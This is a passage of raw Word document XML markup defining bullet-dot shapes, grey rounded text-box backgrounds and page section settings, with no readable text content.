                            <a:gd name="T18" fmla="+- 0 12741 12720"/>
                            <a:gd name="T19" fmla="*/ 12741 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 12720 12720"/>
                            <a:gd name="T23" fmla="*/ 12720 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 12720 12720"/>
                            <a:gd name="T27" fmla="*/ 12720 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 12744 12720"/>
                            <a:gd name="T31" fmla="*/ 12744 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 12748 12720"/>
                            <a:gd name="T35" fmla="*/ 12748 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 12769 12720"/>
                            <a:gd name="T39" fmla="*/ 1276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5506B" id="Freeform 235" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:636pt;width:2.45pt;height:2.45pt;z-index:-1550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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,8108315;13335,8108315;11430,8107680;0,8094980;0,8090535;13335,8077200;17780,8077200;31115,8092440;31115,8094980;17780,810831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1465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8030845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="231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12647"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="232" name="Freeform 234"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="12647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12829 12647"/>
                              <a:gd name="T3" fmla="*/ 12829 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 12829 12647"/>
                              <a:gd name="T7" fmla="*/ 12829 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 12829 12647"/>
                              <a:gd name="T11" fmla="*/ 12829 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 12808 12647"/>
                              <a:gd name="T15" fmla="*/ 12808 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 12805 12647"/>
                              <a:gd name="T19" fmla="*/ 12805 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 12668 12647"/>
                              <a:gd name="T23" fmla="*/ 12668 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 12647 12647"/>
                              <a:gd name="T27" fmla="*/ 12647 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 12647 12647"/>
                              <a:gd name="T31" fmla="*/ 12647 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 12668 12647"/>
                              <a:gd name="T35" fmla="*/ 12668 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 12808 12647"/>
                              <a:gd name="T39" fmla="*/ 12808 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 12829 12647"/>
                              <a:gd name="T43" fmla="*/ 12829 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 12829 12647"/>
                              <a:gd name="T47" fmla="*/ 1282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2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2647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2" o:spid="_x0000_s2130" style="position:absolute;margin-left:96.5pt;margin-top:632.35pt;width:49.85pt;height:9.15pt;z-index:-15501824;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,12647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">
                <v:shape id="Freeform 234" o:spid="_x0000_s2131" style="position:absolute;left:1930;top:12647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y/n8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEL6KpFZa1GkUUwYMurH/uz+bZ&#10;FpuX2qTa/fYbQdjjMDO/YWaL1pTiQbUrLCsYDSMQxKnVBWcKTsfN4AuE88gaS8uk4JccLOadjxkm&#10;2j75hx4Hn4kAYZeggtz7KpHSpTkZdENbEQfvamuDPsg6k7rGZ4CbUsZR9CkNFhwWcqxolVN6OzRG&#10;wf4+ket1eVv2v3fXxjWX82WsR0r1uu1yCsJT6//D7/ZWK4jHMbzOh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rL+fxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,12829;21,12829;18,12829;0,12808;0,12805;0,12668;21,12647;976,12647;997,12668;997,12808;979,12829;976,12829" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 233" o:spid="_x0000_s2132" type="#_x0000_t202" style="position:absolute;left:1930;top:12647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VkWc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Wz+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WRZ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1516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8300720</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="230" name="Freeform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3121 13072"/>
                            <a:gd name="T3" fmla="*/ 13121 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 13121 13072"/>
                            <a:gd name="T7" fmla="*/ 13121 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 13120 13072"/>
                            <a:gd name="T11" fmla="*/ 13120 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 13100 13072"/>
                            <a:gd name="T15" fmla="*/ 13100 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 13094 13072"/>
                            <a:gd name="T19" fmla="*/ 13094 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 13072 13072"/>
                            <a:gd name="T23" fmla="*/ 13072 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 13072 13072"/>
                            <a:gd name="T27" fmla="*/ 13072 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 13097 13072"/>
                            <a:gd name="T31" fmla="*/ 13097 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 13100 13072"/>
                            <a:gd name="T35" fmla="*/ 13100 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 13121 13072"/>
                            <a:gd name="T39" fmla="*/ 1312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2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E74E2" id="Freeform 231" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:653.6pt;width:2.45pt;height:2.45pt;z-index:-1550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" path="m28,49r-7,l18,48,,28,,22,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,8331835;13335,8331835;11430,8331200;0,8318500;0,8314690;13335,8300720;17780,8300720;31115,8316595;31115,8318500;17780,833183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1568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8255000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="227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16205"/>
                          <a:chOff x="1930" y="13000"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="228" name="Freeform 230"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="12999"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2480 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 13182 13000"/>
                              <a:gd name="T3" fmla="*/ 13182 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 13182 13000"/>
                              <a:gd name="T7" fmla="*/ 13182 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 13181 13000"/>
                              <a:gd name="T11" fmla="*/ 13181 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 13161 13000"/>
                              <a:gd name="T15" fmla="*/ 13161 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 13158 13000"/>
                              <a:gd name="T19" fmla="*/ 13158 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 13021 13000"/>
                              <a:gd name="T23" fmla="*/ 13021 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 13000 13000"/>
                              <a:gd name="T27" fmla="*/ 13000 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2480 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 13000 13000"/>
                              <a:gd name="T31" fmla="*/ 13000 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2501 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 13021 13000"/>
                              <a:gd name="T35" fmla="*/ 13021 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2501 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 13161 13000"/>
                              <a:gd name="T39" fmla="*/ 13161 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2483 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 13181 13000"/>
                              <a:gd name="T43" fmla="*/ 13181 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2480 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 13182 13000"/>
                              <a:gd name="T47" fmla="*/ 1318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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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50" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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2999"/>
                            <a:ext cx="57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8" o:spid="_x0000_s2133" style="position:absolute;margin-left:96.5pt;margin-top:650pt;width:28.6pt;height:9.15pt;z-index:-15500800;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,13000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">
                <v:shape id="Freeform 230" o:spid="_x0000_s2134" style="position:absolute;left:1930;top:12999;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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uI6MMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz0vDMBS+C/sfwht4s6lVnHZLi4hTd9umDHZ7a55t&#10;afNSk9jV/94cBI8f3+9VOZlejOR8a1nBdZKCIK6sbrlW8PG+vroH4QOyxt4yKfghD2Uxu1hhru2Z&#10;dzTuQy1iCPscFTQhDLmUvmrIoE/sQBy5T+sMhghdLbXDcww3vczS9E4abDk2NDjQU0NVt/82CrqX&#10;m/FrsT0Op4fDq7vVdbcx62elLufT4xJEoCn8i//cb1pBlsW18Uw8ArL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uI6MMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m550,182r-529,l18,181,,161r,-3l,21,21,,550,r21,21l571,161r-18,20l550,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,13182;21,13182;18,13181;0,13161;0,13158;0,13021;21,13000;550,13000;571,13021;571,13161;553,13181;550,13182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 229" o:spid="_x0000_s2135" type="#_x0000_t202" style="position:absolute;left:1930;top:12999;width:5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TFbs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rJsAb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dMVu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1619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8516620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="226" name="Freeform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3460 13412"/>
                            <a:gd name="T3" fmla="*/ 13460 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 13460 13412"/>
                            <a:gd name="T7" fmla="*/ 13460 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 13460 13412"/>
                            <a:gd name="T11" fmla="*/ 13460 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 13439 13412"/>
                            <a:gd name="T15" fmla="*/ 13439 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 13433 13412"/>
                            <a:gd name="T19" fmla="*/ 13433 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 13412 13412"/>
                            <a:gd name="T23" fmla="*/ 13412 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 13412 13412"/>
                            <a:gd name="T27" fmla="*/ 13412 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 13436 13412"/>
                            <a:gd name="T31" fmla="*/ 13436 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 13439 13412"/>
                            <a:gd name="T35" fmla="*/ 13439 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 13460 13412"/>
                            <a:gd name="T39" fmla="*/ 13460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120F5C" id="Freeform 227" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:670.6pt;width:2.45pt;height:2.45pt;z-index:-1550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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,8547100;13335,8547100;11430,8547100;0,8533765;0,8529955;13335,8516620;17780,8516620;31115,8531860;31115,8533765;17780,854710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1670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8470265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="223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" cy="116205"/>
                          <a:chOff x="1930" y="13339"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="224" name="Freeform 226"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="13338"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2565 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 13521 13339"/>
                              <a:gd name="T3" fmla="*/ 13521 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 13521 13339"/>
                              <a:gd name="T7" fmla="*/ 13521 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 13520 13339"/>
                              <a:gd name="T11" fmla="*/ 13520 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 13500 13339"/>
                              <a:gd name="T15" fmla="*/ 13500 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 13497 13339"/>
                              <a:gd name="T19" fmla="*/ 13497 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 13360 13339"/>
                              <a:gd name="T23" fmla="*/ 13360 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 13339 13339"/>
                              <a:gd name="T27" fmla="*/ 13339 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2565 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 13339 13339"/>
                              <a:gd name="T31" fmla="*/ 13339 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2586 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 13360 13339"/>
                              <a:gd name="T35" fmla="*/ 13360 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2586 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 13500 13339"/>
                              <a:gd name="T39" fmla="*/ 13500 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2568 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 13520 13339"/>
                              <a:gd name="T43" fmla="*/ 13520 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2565 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 13521 13339"/>
                              <a:gd name="T47" fmla="*/ 1352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7" h="183">
                                <a:moveTo>
                                  <a:pt x="63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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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3338"/>
                            <a:ext cx="65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4" o:spid="_x0000_s2136" style="position:absolute;margin-left:96.5pt;margin-top:666.95pt;width:32.85pt;height:9.15pt;z-index:-15499776;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,13339" coordsize="65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">
                <v:shape id="Freeform 226" o:spid="_x0000_s2137" style="position:absolute;left:1930;top:13338;width:657;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="65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i9vsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE70L/Q3gFb27SUNSuRimFQkU9dFvB42Pz&#10;3F26eVk2qa7/3hQKHoeZ+YZZrgfXijP1ofFs4ClTIIhLbxuuDHx/vU/mIEJEtth6JgNXCrBePYyW&#10;mFt/4U86F7ESCcIhRwN1jF0uZShrchgy3xEn7+R7hzHJvpK2x0uCu1ZqpabSYcNpocaO3moqf4pf&#10;ZyAW84PSoXQVql3Y7vV2c3yZGTN+HF4XICIN8R7+b39YA1o/w9+Zd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Yvb7EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m635,182r-614,l18,181,,161r,-3l,21,21,,635,r21,21l656,161r-18,20l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,13521;21,13521;18,13520;0,13500;0,13497;0,13360;21,13339;635,13339;656,13360;656,13500;638,13520;635,13521" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 225" o:spid="_x0000_s2138" type="#_x0000_t202" style="position:absolute;left:1930;top:13338;width:65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Pa8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c9r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rPr>
          <w:sz w:val="7"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:ind w:left="288"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="2"/>
          <w:sz w:val="4"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="5080" t="3810" r="1905" b="3175"/>
                <wp:docPr id="221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15" cy="31115"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="49" cy="49"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="222" name="Freeform 2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" cy="49"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 28 w 49"/>
                              <a:gd name="T1" fmla="*/ 49 h 49"/>
                              <a:gd name="T2" fmla="*/ 21 w 49"/>
                              <a:gd name="T3" fmla="*/ 49 h 49"/>
                              <a:gd name="T4" fmla="*/ 18 w 49"/>
                              <a:gd name="T5" fmla="*/ 48 h 49"/>
                              <a:gd name="T6" fmla="*/ 0 w 49"/>
                              <a:gd name="T7" fmla="*/ 28 h 49"/>
                              <a:gd name="T8" fmla="*/ 0 w 49"/>
                              <a:gd name="T9" fmla="*/ 21 h 49"/>
                              <a:gd name="T10" fmla="*/ 21 w 49"/>
                              <a:gd name="T11" fmla="*/ 0 h 49"/>
                              <a:gd name="T12" fmla="*/ 28 w 49"/>
                              <a:gd name="T13" fmla="*/ 0 h 49"/>
                              <a:gd name="T14" fmla="*/ 49 w 49"/>
                              <a:gd name="T15" fmla="*/ 24 h 49"/>
                              <a:gd name="T16" fmla="*/ 49 w 49"/>
                              <a:gd name="T17" fmla="*/ 28 h 49"/>
                              <a:gd name="T18" fmla="*/ 28 w 49"/>
                              <a:gd name="T19" fmla="*/ 49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28" y="49"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="49"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2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8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="24"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="28"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28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8705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E6F9DF" id="Group 222" o:spid="_x0000_s1026" style="width:2.45pt;height:2.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 223" o:spid="_x0000_s1027" style="position:absolute;width:49;height:49;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="49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LMN8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5p1wVZWo4htQWgvXQWvj81z&#10;s5q8LJtUV399Uyh4HGbmG2ax6p0VF+pC41nBZJyBIK68brhWsN99PM9AhIis0XomBTcKsFoOnhZY&#10;aH/lb7qUsRYJwqFABSbGtpAyVIYchrFviZN39J3DmGRXS93hNcGdlXmWvUiHDacFgy1tDFXn8scp&#10;+Gr0/Z5tPk+z9+nhNZjSrsObVWo07NdzEJH6+Aj/t7daQZ7n8HcmHQ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CzDfEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                  <v:fill opacity="57054f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="28,49;21,49;18,48;0,28;0,21;21,0;28,0;49,24;49,28;28,49" o:connectangles="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7"/>
          <w:position w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:spacing w:val="67"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471170" cy="116205"/>
                <wp:effectExtent l="0" t="6985" r="5080" b="635"/>
                <wp:docPr id="218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0" y="0"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="219" name="Freeform 2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42" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 720 w 742"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 742"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 742"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 742"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 742"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 742"/>
